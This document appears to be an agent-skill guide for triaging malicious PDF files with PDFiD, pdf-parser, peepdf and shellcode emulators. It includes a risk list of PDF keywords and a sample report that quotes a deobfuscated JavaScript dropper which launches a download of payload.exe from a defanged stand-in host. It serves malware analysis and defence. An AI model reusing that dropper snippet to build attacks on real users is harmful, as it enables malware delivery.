Source: https://github.com/plurigrid/asi (plugins/asi/skills/analyzing-pdf-malware-with-pdfid/SKILL.md)
Analyzing PDF Malware with PDFiD
When to Use
- A suspicious PDF attachment has been flagged by email security or reported by a user
- You need to determine if a PDF contains embedded JavaScript, shellcode, or exploit code
- Triaging PDF documents before opening them in a sandbox or analysis environment
- Extracting embedded executables, scripts, or URLs from malicious PDF objects
- Analyzing PDF exploit kits targeting Adobe Reader or other PDF viewer vulnerabilities
Do not use for analyzing the rendered visual content of a PDF; this is for structural analysis of the PDF file format for malicious objects.
Prerequisites
- Python 3.8+ with Didier Stevens' PDF tools installed (`pip install pdfid pdf-parser`)
- peepdf installed for interactive PDF analysis (`pip install peepdf`)
- pdftotext from poppler-utils for extracting text content safely
- YARA with PDF-specific rules for malware family identification
- Isolated analysis VM without a PDF reader installed (prevent accidental opening)
- CyberChef for decoding embedded Base64, hex, or deflate streams
Workflow
Step 1: Initial Triage with PDFiD
Scan the PDF for suspicious keywords and structures:

    # Run PDFiD to identify suspicious elements
    pdfid suspect.pdf

    # Expected output analysis:
    # /JS           - JavaScript (HIGH risk)
    # /JavaScript   - JavaScript object (HIGH risk)
    # /AA           - Additional Actions, triggered by events such as page open (HIGH risk)
    # /OpenAction   - Action on document open (HIGH risk)
    # /Launch       - Launch external application (HIGH risk)
    # /EmbeddedFile - Embedded file (MEDIUM risk)
    # /RichMedia    - Flash content (MEDIUM risk)
    # /ObjStm       - Object stream (used for obfuscation)
    # /URI          - URL reference (contextual risk)
    # /AcroForm     - Interactive form (MEDIUM risk)

    # Run with extra detail
    pdfid -e suspect.pdf

    # Run with disarming (rename suspicious keywords)
    pdfid -d suspect.pdf


    PDFiD Risk Assessment:
    ━━━━━━━━━━━━━━━━━━━━━
    HIGH RISK indicators (any count > 0):
      /JS, /JavaScript  -> Embedded JavaScript code
      /AA               -> Additional Actions (can trigger without explicit user interaction)
      /OpenAction       -> Code runs when document is opened
      /Launch           -> Can launch external executables
      /JBIG2Decode      -> Associated with CVE-2009-0658 exploit

    MEDIUM RISK indicators:
      /EmbeddedFile     -> Contains embedded files (could be EXE/DLL)
      /RichMedia        -> Flash/multimedia (Flash exploits)
      /AcroForm         -> Form with possible submit action
      /XFA              -> XML Forms Architecture (complex attack surface)

    LOW RISK indicators:
      /ObjStm           -> Object streams (obfuscation technique)
      /URI              -> External URL references
      /Page             -> Number of pages (context only)

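The tiers above can be applied mechanically to saved PDFiD output. The following is a minimal sketch, assuming the output consists of lines holding a `/Keyword` followed by a count; the `SAMPLE` text and the helper names `parse_pdfid` and `assess` are illustrative and not part of PDFiD.

```python
import re

# Risk tiers copied from the assessment above.
HIGH = {"/JS", "/JavaScript", "/AA", "/OpenAction", "/Launch", "/JBIG2Decode"}
MEDIUM = {"/EmbeddedFile", "/RichMedia", "/AcroForm", "/XFA"}
LOW = {"/ObjStm", "/URI"}

# Assumed line shape: a /Keyword, whitespace, a count, and an optional
# second count in parentheses (printed for hex-obfuscated names).
COUNT_LINE = re.compile(r"^\s*(/\w+)\s+(\d+)(?:\(\d+\))?\s*$")


def parse_pdfid(text):
    """Return {keyword: count} for every /Keyword line in PDFiD-style output."""
    counts = {}
    for line in text.splitlines():
        match = COUNT_LINE.match(line)
        if match:
            counts[match.group(1)] = int(match.group(2))
    return counts


def assess(counts):
    """Group the keywords with a non-zero count by risk tier."""
    tiers = (("HIGH", HIGH), ("MEDIUM", MEDIUM), ("LOW", LOW))
    return {
        name: sorted(k for k in keys if counts.get(k, 0) > 0)
        for name, keys in tiers
    }


# Illustrative sample, not output captured from a real file.
SAMPLE = """\
 /Page                  1
 /ObjStm                1
 /JS                    1
 /JavaScript            1
 /AA                    0
 /OpenAction            1
 /Launch                0
 /EmbeddedFile          0
"""

if __name__ == "__main__":
    for tier, hits in assess(parse_pdfid(SAMPLE)).items():
        print(tier, hits)
```

Any non-empty HIGH list is a reason to continue with the structural analysis in the next step rather than a verdict on its own.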
Step 2: Parse PDF Structure with pdf-parser
Examine suspicious objects identified by PDFiD:

    # List all objects referencing JavaScript
    pdf-parser --search "/JavaScript" suspect.pdf
    pdf-parser --search "/JS" suspect.pdf

    # List all objects with OpenAction
    pdf-parser --search "/OpenAction" suspect.pdf

    # Extract a specific object by ID (example: object 5)
    pdf-parser --object 5 suspect.pdf

    # Extract and decompress stream content
    pdf-parser --object 5 --filter --raw suspect.pdf

    # Search for embedded files
    pdf-parser --search "/EmbeddedFile" suspect.pdf

    # Show document statistics (object counts grouped by type)
    pdf-parser --stats suspect.pdf

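Once pdf-parser has listed the objects, the usual next question is which objects a trigger such as /OpenAction leads to. The sketch below assumes pdf-parser's text layout of an `obj <id> <generation>` header followed by a `Referencing:` line; the `SAMPLE` text and the function names are hypothetical.

```python
import re
from collections import deque

OBJ_HEADER = re.compile(r"^obj (\d+) (\d+)\s*$")
REFERENCE = re.compile(r"(\d+) \d+ R")


def parse_references(parser_output):
    """Map each object ID to the object IDs named on its 'Referencing:' line."""
    refs = {}
    current = None
    for line in parser_output.splitlines():
        header = OBJ_HEADER.match(line)
        if header:
            current = int(header.group(1))
            refs.setdefault(current, [])
        elif current is not None and line.strip().startswith("Referencing:"):
            refs[current] = [int(n) for n in REFERENCE.findall(line)]
    return refs


def reachable_from(refs, start):
    """Breadth-first walk of the reference graph, returning IDs in visit order."""
    seen, queue, order = {start}, deque([start]), []
    while queue:
        obj = queue.popleft()
        order.append(obj)
        for nxt in refs.get(obj, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return order


# Illustrative text in the assumed layout, not output from a real sample.
SAMPLE = """\
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 5 0 R

obj 5 0
 Type: /Action
 Referencing: 8 0 R

obj 8 0
 Type:
 Referencing:
 Contains stream
"""

if __name__ == "__main__":
    print(reachable_from(parse_references(SAMPLE), 5))
```

Each ID returned by `reachable_from` is a candidate for `pdf-parser --object <id> --filter --raw`.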
Step 3: Extract and Analyze Embedded JavaScript
Pull out JavaScript code from PDF objects:

    # Extract JavaScript using pdf-parser
    pdf-parser --search "/JS" --raw --filter suspect.pdf > extracted_js.txt

    # Alternative: Use peepdf for interactive JavaScript extraction
    peepdf -f -i suspect.pdf << 'EOF'
    js_analyse
    EOF

    # peepdf interactive commands for JS analysis:
    # js_analyse        - Extract and show all JavaScript code
    # js_beautify       - Format extracted JavaScript
    # js_eval <object>  - Evaluate JavaScript in sandboxed environment
    # object <id>       - Display object content
    # rawobject <id>    - Display raw object bytes
    # stream <id>       - Display decompressed stream
    # offsets           - Show object offsets in file


    # Python script for comprehensive PDF JavaScript extraction
    import re
    import subprocess

    PDF = "suspect.pdf"

    # Find the IDs of objects that mention JavaScript. pdf-parser prints each
    # matching object under a header line of the form "obj <id> <generation>";
    # the --stats output does not list objects this way, so --search is used.
    js_objects = set()
    for keyword in ("/JavaScript", "/JS"):
        result = subprocess.run(
            ["pdf-parser", "--search", keyword, PDF],
            capture_output=True, text=True, errors="replace"
        )
        js_objects.update(re.findall(r"^obj (\d+) \d+", result.stdout, re.MULTILINE))

    # Extract each JavaScript-containing object with its stream decompressed
    for obj_id in sorted(js_objects, key=int):
        result = subprocess.run(
            ["pdf-parser", "--object", obj_id, "--filter", "--raw", PDF],
            capture_output=True, text=True, errors="replace"
        )
        print(f"\n=== Object {obj_id} ===")
        print(result.stdout[:2000])

Step 4: Analyze Embedded Shellcode
Extract and examine shellcode from PDF exploits:

    # Extract raw stream data for shellcode analysis
    pdf-parser --object 7 --filter --raw --dump shellcode.bin suspect.pdf

    # Analyze shellcode with scdbg (shellcode debugger)
    # (on Linux builds the flag is usually written -f)
    scdbg /f shellcode.bin

    # Alternative: Use speakeasy for shellcode emulation
    python3 - << 'EOF'
    import speakeasy

    se = speakeasy.Speakeasy()
    sc_addr = se.load_shellcode('shellcode.bin', 'x86')
    se.run_shellcode(sc_addr, offset=0)

    # Review API calls made by the shellcode
    # (report layout may differ between speakeasy versions)
    for entry in se.get_report().get('entry_points', []):
        for call in entry.get('apis', []):
            print(f"{call.get('api_name')}: {call.get('args')}")
    EOF

    # Use CyberChef to decode hex/base64 encoded shellcode
    # Input: Extracted stream data
    # Recipe: From Hex -> Disassemble x86

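Shellcode carried in PDF JavaScript is often written as `%uXXXX` escapes inside an `unescape()` call instead of as raw stream bytes. The sketch below assumes that form and converts it to a byte string that scdbg or speakeasy can load; each `%uXXXX` is one 16-bit value stored little-endian, and anything that is not a `%uXXXX` token is skipped. The function name is hypothetical.

```python
import re
import struct

UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")


def unicode_escapes_to_bytes(escaped):
    """Convert '%u9090%u1234'-style text to bytes, two bytes per escape."""
    out = bytearray()
    for hex_word in UNICODE_ESCAPE.findall(escaped):
        # Little-endian: %u1234 becomes the byte pair 34 12.
        out += struct.pack("<H", int(hex_word, 16))
    return bytes(out)


if __name__ == "__main__":
    payload = unicode_escapes_to_bytes("%u9090%u9090%u1234")
    print(payload.hex())
    # Write the result to a file for emulation, for example:
    # open("shellcode.bin", "wb").write(payload)
```

Plain hex text can be converted with the standard `bytes.fromhex()` instead.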
Step 5: Extract Embedded Files and URLs
Pull out embedded executables and linked resources:

    # Extract embedded files and URLs from a PDF
    import hashlib
    import re
    import subprocess

    PDF = "suspect.pdf"

    # Dump embedded-file objects with their streams decompressed (raw bytes)
    result = subprocess.run(
        ["pdf-parser", "--search", "/EmbeddedFile", "--raw", "--filter", PDF],
        capture_output=True
    )

    with open(PDF, "rb") as f:
        raw = f.read()

    # Search both the raw file and the decompressed output for the MZ header;
    # a compressed embedded file is not visible in the raw bytes
    for label, data in (("raw", raw), ("filtered", result.stdout)):
        offset = 0
        while True:
            pos = data.find(b"MZ", offset)
            if pos == -1:
                break
            # Verify the PE signature that e_lfanew (offset 0x3C) points to
            if pos + 0x40 <= len(data):
                pe_offset = int.from_bytes(data[pos+0x3C:pos+0x40], "little")
                if data[pos+pe_offset:pos+pe_offset+4] == b"PE\x00\x00":
                    print(f"Embedded PE found in {label} data at offset 0x{pos:X}")
                    # Initial extraction: fixed 100,000-byte window, not the real PE size
                    embedded = data[pos:pos+100000]
                    sha256 = hashlib.sha256(embedded).hexdigest()
                    with open(f"embedded_{label}_{pos:X}.exe", "wb") as out:
                        out.write(embedded)
                    print(f"  SHA-256: {sha256}")
            offset = pos + 1

    # Extract URLs from the PDF
    result = subprocess.run(
        ["pdf-parser", "--search", "/URI", "--raw", PDF],
        capture_output=True, text=True, errors="replace"
    )
    # Exclude parentheses: PDF string literals wrap URIs as (http://...)
    urls = re.findall(r'https?://[^\s<>"()]+', result.stdout)
    for url in sorted(set(urls)):
        print(f"URL: {url}")

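The extraction above takes a fixed 100,000-byte window, so the hash of the carved file will not match the original executable. A closer estimate can be read from the PE section table. The sketch below is one way to do that under simplifying assumptions: it ignores overlay data and certificate tables appended after the last section, and the function name is hypothetical.

```python
import struct


def pe_size_from_headers(data, pos=0):
    """Estimate a PE file's on-disk size from its section table.

    Returns None when the bytes at pos do not look like a PE file.
    """
    if data[pos:pos + 2] != b"MZ" or pos + 0x40 > len(data):
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
    pe = pos + e_lfanew
    if data[pe:pe + 4] != b"PE\x00\x00" or pe + 24 > len(data):
        return None
    # COFF header: NumberOfSections at +6, SizeOfOptionalHeader at +20.
    (num_sections,) = struct.unpack_from("<H", data, pe + 6)
    (opt_size,) = struct.unpack_from("<H", data, pe + 20)
    table = pe + 24 + opt_size
    size = table + 40 * num_sections - pos  # at least the headers themselves
    for i in range(num_sections):
        entry = table + 40 * i
        if entry + 40 > len(data):
            return None
        # Section header: SizeOfRawData at +16, PointerToRawData at +20.
        raw_size, raw_ptr = struct.unpack_from("<II", data, entry + 16)
        size = max(size, raw_ptr + raw_size)
    return size
```

With this helper, `data[pos:pos + size]` replaces the fixed window whenever `size` is not `None` and does not run past the end of the data.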
Step 6: Generate Analysis Report
Document all findings from the PDF analysis:
Analysis should cover:
- PDFiD triage results (suspicious keyword counts)
- PDF structure anomalies (object streams, cross-reference issues)
- Extracted JavaScript code (deobfuscated if needed)
- Shellcode analysis results (API calls, network indicators)
- Embedded files extracted with hashes
- URLs and external references
- CVE identification if a known exploit is detected
- YARA rule matches against known PDF malware families
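Collecting these findings in one structure makes the report easier to compare across samples. The sketch below builds a JSON-serializable record from the file bytes, the PDFiD counts, and the extracted URLs; the field names and the `build_report` helper are assumptions chosen for illustration, not a standard schema.

```python
import hashlib
import json


def hashes_of(data):
    """Return SHA-1 and SHA-256 hex digests for a byte string."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("sha1", "sha256")}


def build_report(filename, data, pdfid_counts, urls, notes=""):
    """Assemble the triage findings into one dictionary."""
    return {
        "file": filename,
        "size_bytes": len(data),
        "hashes": hashes_of(data),
        # Keep only keywords that actually occurred.
        "pdfid": {k: v for k, v in pdfid_counts.items() if v > 0},
        "urls": sorted(set(urls)),
        "notes": notes,
    }


if __name__ == "__main__":
    report = build_report(
        "suspect.pdf",
        b"%PDF-1.7 example bytes",
        {"/JS": 1, "/OpenAction": 1, "/Launch": 0},
        ["http://example.com/a", "http://example.com/a"],
    )
    print(json.dumps(report, indent=2))
```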
Key Concepts
| Term | Definition |
|---|---|
| PDF Object | Basic building block of a PDF file; objects can contain streams (compressed data), dictionaries, arrays, and references to other objects |
| OpenAction | PDF dictionary entry specifying an action to execute when the document is opened; commonly used to trigger JavaScript exploits |
| PDF Stream | Compressed data within a PDF object that can contain JavaScript, images, embedded files, or shellcode; typically FlateDecode compressed |
| FlateDecode | Zlib/deflate compression filter applied to PDF streams; must be decompressed to analyze contents |
| ObjStm (Object Stream) | PDF feature storing multiple objects within a single compressed stream; used by malware to hide suspicious objects from simple parsers |
| JBIG2 | Image compression standard in PDFs; historical source of exploits (CVE-2009-0658, CVE-2021-30860 FORCEDENTRY) |
| PDF JavaScript API | Adobe-specific JavaScript extensions available in PDF documents for form manipulation, network access, and OS interaction |
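To make the ObjStm entry concrete: after decompression, an object stream starts with N pairs of integers (object number, byte offset), followed by the objects themselves, and the stream dictionary's /First value gives the offset where the first object begins. The sketch below splits such a payload; it assumes the stream is already decoded, that offsets are listed in ascending order, and that N and /First have been read from the dictionary. The function name is hypothetical.

```python
def parse_objstm(decoded, n, first):
    """Split a decoded /ObjStm payload into {object_number: object_bytes}."""
    header = decoded[:first].split()
    if len(header) < 2 * n:
        raise ValueError("object stream header is shorter than /N implies")
    # Header pairs: (object number, offset relative to /First).
    pairs = [(int(header[2 * i]), int(header[2 * i + 1])) for i in range(n)]
    objects = {}
    for index, (number, offset) in enumerate(pairs):
        # Each object runs up to the next object's offset, or to the end.
        end = pairs[index + 1][1] if index + 1 < n else len(decoded) - first
        objects[number] = decoded[first + offset:first + end].strip()
    return objects


if __name__ == "__main__":
    # Illustrative payload holding two objects, numbered 15 and 16.
    obj_a = b"<< /S /JavaScript /JS 16 0 R >>"
    obj_b = b"(app.alert(1))"
    header = b"15 0 16 %d " % (len(obj_a) + 1)
    payload = header + obj_a + b" " + obj_b
    for number, body in parse_objstm(payload, 2, len(header)).items():
        print(number, body)
```

Keyword scans that run only over the raw file never see objects stored this way, which is why a non-zero /ObjStm count deserves a closer look.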
Tools & Systems
- PDFiD: Didier Stevens' tool for scanning PDF documents for suspicious keywords and structures without parsing the full document
- pdf-parser: Companion tool to PDFiD for detailed PDF object extraction, stream decompression, and content analysis
- peepdf: Python-based PDF analysis tool providing interactive shell for object inspection and JavaScript extraction
- QPDF: PDF transformation tool for linearizing, decrypting, and restructuring PDFs for easier analysis
- scdbg: Shellcode analysis tool that emulates x86 shellcode execution and logs API calls
Common Scenarios
Scenario: Triaging a Phishing PDF with Embedded JavaScript
Context: Email gateway flagged a PDF attachment with suspicious JavaScript indicators. The security team needs to determine if it contains an exploit or a social engineering redirect.
Approach:
- Run PDFiD to confirm /JS, /JavaScript, and /OpenAction presence and counts
- Use pdf-parser to extract the OpenAction object and follow its reference chain
- Extract the JavaScript code from the referenced stream object (apply FlateDecode filter)
- Deobfuscate the JavaScript (decode hex strings, resolve eval chains)
- Determine if the script exploits a PDF reader vulnerability (check for heap spray, ROP chains) or performs a redirect
- Extract all URLs, IPs, and embedded files as IOCs
- Classify the sample: exploit (specific CVE) or social engineering (redirect/phishing)
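The deobfuscation step can be partly scripted without executing any of the sample's code. The sketch below handles one common pattern only: it replaces `unescape("...")` calls that take a string literal with the decoded literal, repeating until nothing changes. It assumes `%XX` escapes (decoded as Latin-1); `%uXXXX` escapes and computed arguments are left untouched. The function name is hypothetical.

```python
import json
import re
from urllib.parse import unquote

# unescape( "literal" ) or unescape( 'literal' )
UNESCAPE_CALL = re.compile(r"unescape\(\s*([\"'])(.*?)\1\s*\)", re.DOTALL)


def peel_unescape(js, max_layers=10):
    """Return each successive version of js as unescape() literals are decoded."""
    layers = [js]
    for _ in range(max_layers):
        decoded = UNESCAPE_CALL.sub(
            # Re-quote the decoded text so the result stays readable as JavaScript.
            lambda m: json.dumps(unquote(m.group(2), encoding="latin-1")),
            layers[-1],
        )
        if decoded == layers[-1]:
            break
        layers.append(decoded)
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(peel_unescape('eval(unescape("%68%65%6C%6C%6F"))')):
        print(f"Layer {depth}: {layer}")
```

The script never calls `eval`; what the innermost layer does still has to be read and judged by the analyst.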
Pitfalls:
- Opening the PDF in a standard reader instead of analyzing it with command-line tools
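- Missing JavaScript hidden inside object streams (/ObjStm): PDFiD reports that object streams are present, but keywords inside the compressed stream are invisible to it and to simple parsers until the stream is decoded (pdf-parser's --objstm option parses object streams)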
- Not decompressing streams before analysis (FlateDecode, ASCIIHexDecode, ASCII85Decode filters)
- Assuming the absence of /JS means no JavaScript; code can be embedded in form fields (/AcroForm with /XFA)
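When a stream has been carved out by hand, the filters named in the pitfalls can be undone with the Python standard library. The sketch below applies a stream's /Filter list in the order given and covers only FlateDecode, ASCIIHexDecode, and ASCII85Decode; it does not handle /DecodeParms predictors or other filters, and the function names are hypothetical.

```python
import base64
import binascii
import zlib


def ascii_hex_decode(data):
    """Decode ASCIIHexDecode data: hex digits, optional whitespace, '>' terminator."""
    digits = bytes(c for c in data.split(b">")[0] if not chr(c).isspace())
    if len(digits) % 2:
        digits += b"0"  # an odd final digit is treated as if followed by 0
    return binascii.unhexlify(digits)


def ascii85_decode(data):
    """Decode ASCII85Decode data, tolerating the '<~' and '~>' markers."""
    body = data.strip()
    if body.startswith(b"<~"):
        body = body[2:]
    if body.endswith(b"~>"):
        body = body[:-2]
    return base64.a85decode(body)


DECODERS = {
    "/FlateDecode": zlib.decompress,
    "/ASCIIHexDecode": ascii_hex_decode,
    "/ASCII85Decode": ascii85_decode,
}


def apply_filters(data, filters):
    """Run each named filter in order; raises KeyError for unsupported filters."""
    for name in filters:
        data = DECODERS[name](data)
    return data


if __name__ == "__main__":
    # Build a doubly encoded stream, then decode it again.
    encoded = binascii.hexlify(zlib.compress(b"app.alert(1)")) + b">"
    print(apply_filters(encoded, ["/ASCIIHexDecode", "/FlateDecode"]))
```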
Output Format

    PDF MALWARE ANALYSIS REPORT
    ==============================
    File:          invoice_2025.pdf
    SHA-256:       e3b0c44298fc1c149afbf4c8996fb924...
    File Size:     45,312 bytes
    PDF Version:   1.7

    PDFID TRIAGE
    /JS:            1  [HIGH RISK]
    /JavaScript:    1  [HIGH RISK]
    /OpenAction:    1  [HIGH RISK]
    /EmbeddedFile:  0
    /Launch:        0
    /URI:           2
    /Page:          1
    /ObjStm:        1  [OBFUSCATION]

    SUSPICIOUS OBJECTS
    Object 5:  /OpenAction -> references Object 8
    Object 8:  /JavaScript stream (FlateDecode, 2,847 bytes decompressed)
    Object 12: /ObjStm containing objects 15-18

    EXTRACTED JAVASCRIPT
    Layer 1: eval(unescape("%68%65%6C%6C%6F"))
    Layer 2: var url = "hxxp://malicious[.]com/payload.exe";
             app.launchURL(url, true);
             // Social engineering redirect, not exploit

    EXTRACTED IOCs
    URLs:     hxxp://malicious[.]com/payload.exe
              hxxps://fake-login[.]com/adobe/verify
    Domains:  malicious[.]com, fake-login[.]com

    CLASSIFICATION
    Type:    Social Engineering (URL redirect)
    CVE:     None (no exploit code detected)
    Risk:    HIGH (downloads executable payload)
    Family:  Generic PDF Dropper

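The IOCs in the report are written in defanged form (`hxxp`, `[.]`) so they cannot be clicked or auto-linked by accident. A minimal sketch of that convention follows; the `defang` helper is hypothetical and handles only URLs and bare domains.

```python
import re

URL = re.compile(r"^(?P<scheme>[A-Za-z][A-Za-z0-9+.-]*)://(?P<host>[^/?#]*)(?P<rest>.*)$")


def defang(ioc):
    """Rewrite a URL or domain so it is no longer directly usable."""
    match = URL.match(ioc)
    if not match:
        # Bare domain or IP address: bracket every dot.
        return ioc.replace(".", "[.]")
    scheme = match.group("scheme").lower().replace("http", "hxxp", 1)
    host = match.group("host").replace(".", "[.]")
    # Dots in the path (for example payload.exe) are left as they are.
    return f"{scheme}://{host}{match.group('rest')}"


if __name__ == "__main__":
    for ioc in ("http://malicious.com/payload.exe", "fake-login.com"):
        print(defang(ioc))
```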